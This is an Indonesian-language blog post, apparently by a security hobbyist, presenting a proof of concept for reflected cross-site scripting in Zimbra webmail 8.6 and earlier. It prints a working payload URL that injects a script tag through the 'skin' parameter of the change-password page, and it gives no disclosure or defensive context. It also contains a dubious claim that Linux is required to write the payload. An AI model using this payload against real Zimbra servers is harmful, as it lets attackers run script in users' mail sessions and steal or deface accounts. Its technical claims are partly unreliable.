[POC] XSS pada Zimbra 8.6

Hello,

Sebelumnya mau memperkenalkan saya Arif. Salah satu Engineer di IT Security yang sangat senang terkait Cyber Security, Offensive Cyber, dan Lain-Lain.

Kali ini saya mau posting terkait ZIMBRA. Yang belum tau Zimbra bisa saya jelaskan dulu.

Zimbra adalah software open source untuk email server dan kolaborasi (groupware), yang menyediakan solusi email server yang powerful, penjadwalan, kalender grup, kontak dan manajemen penyimpananan dokumen via web. Zimbra server tersedia untuk Linux, Mac OS X dan platform virtualisasi.

Saat ini Zimbra sudah melakukan yang terbaik untuk menutup celah serangan dan menjaga keamanan yang baik namun dapat kita ketahui bahwa “no system is safe”.

Karena saya penasaran dan iseng untuk mengoprek sesuatu yang berhubungan dengan system, kemudian saya melakukan testing terhadap suatu zimbra email yang memiliki versi 8.6 kebawah

script yang saya gunakan

http://(localhost.xxx.xxx)/h/changepass?skin=”><script>alert(‘hacked by arif-itsecurity’);</script>

untuk melakukan penulisan payload tersebut pastikan kita menggunakan OS Linux

setelah kita lakukan save maka dengan sendirinya XSS akan tertriger

Sekian Terima kasih